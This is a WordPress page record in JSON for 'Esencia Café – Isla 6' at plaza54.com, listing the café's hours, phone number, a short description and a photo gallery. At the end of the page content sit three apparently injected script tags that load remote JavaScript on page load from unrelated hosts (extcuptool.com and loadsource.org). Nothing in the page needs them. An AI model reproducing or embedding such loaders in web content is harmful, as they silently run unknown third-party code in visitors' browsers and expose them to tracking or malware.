{"id":9863,"date":"2018-08-22T10:01:18","date_gmt":"2018-08-22T10:01:18","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=9863"},"modified":"2019-01-04T10:41:16","modified_gmt":"2019-01-04T10:41:16","slug":"esencia-cafe","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/esencia-cafe\/","title":{"rendered":"Esencia Caf\u00e9"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a09048966a70 .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a09048966a70 .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a09048966d45 { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09048966d45 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966d45 .cmsmasters_heading, #cmsmasters_heading_6a09048966d45 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966d45 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966d63 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048966d63 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966d63 .cmsmasters_heading, #cmsmasters_heading_6a09048966d63 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966d63 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966d79 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048966d79 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966d79 .cmsmasters_heading, #cmsmasters_heading_6a09048966d79 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966d79 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966d8f { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048966d8f .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966d8f .cmsmasters_heading, #cmsmasters_heading_6a09048966d8f .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966d8f .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966da3 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09048966da3 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966da3 .cmsmasters_heading, #cmsmasters_heading_6a09048966da3 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966da3 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966db6 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09048966db6 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09048966db6 .cmsmasters_heading, #cmsmasters_heading_6a09048966db6 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966db6 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09048966e2b { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a09048966e2b .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a09048966e2b .cmsmasters_heading, #cmsmasters_heading_6a09048966e2b .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09048966e2b .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a09048966e45 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a09048966ea6 { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a09048966eca .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a09048966eca .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a09048966a70\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esencia.jpg\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a09048966d45\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048966d63\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a Viernes: 7:00 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048966d79\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">S\u00e1bados: 7:00 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048966d8f\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Domingos y festivos: 11:00 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048966da3\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09048966db6\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">2170259<\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a09048966e2b\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Esencia Caf\u00e9 &#8211; Isla 6<\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a09048966e45\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<p>En nuestra cafeter\u00eda encontrar\u00e1s productos frescos y servidos al momento de la orden. Nuestro caf\u00e9 se destaca por su frescura, el cual siempre puede ser acompa\u00f1ado de un producto delicioso de panader\u00eda y a un precio justo.<\/p>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a09048966ea6\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a09048966eca\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe1.jpg\" rel=\"ilightbox[6a09048966eca]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe2.jpg\" rel=\"ilightbox[6a09048966eca]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe3.jpg\" rel=\"ilightbox[6a09048966eca]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/esenciacafe3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a09048966eca').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a09048966eca', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a090489676f3\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_701356722&amp;key=1b3622eba14d06227e&amp;cv=1533752397&amp;t=1533752396913\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_121572048&amp;key=1b3622eba14d06227e&amp;cv=15913&amp;t=1533752396914\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533752396923\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9863","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9863","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=9863"}],"version-history":[{"count":6,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9863\/revisions"}],"predecessor-version":[{"id":10687,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9863\/revisions\/10687"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=9863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}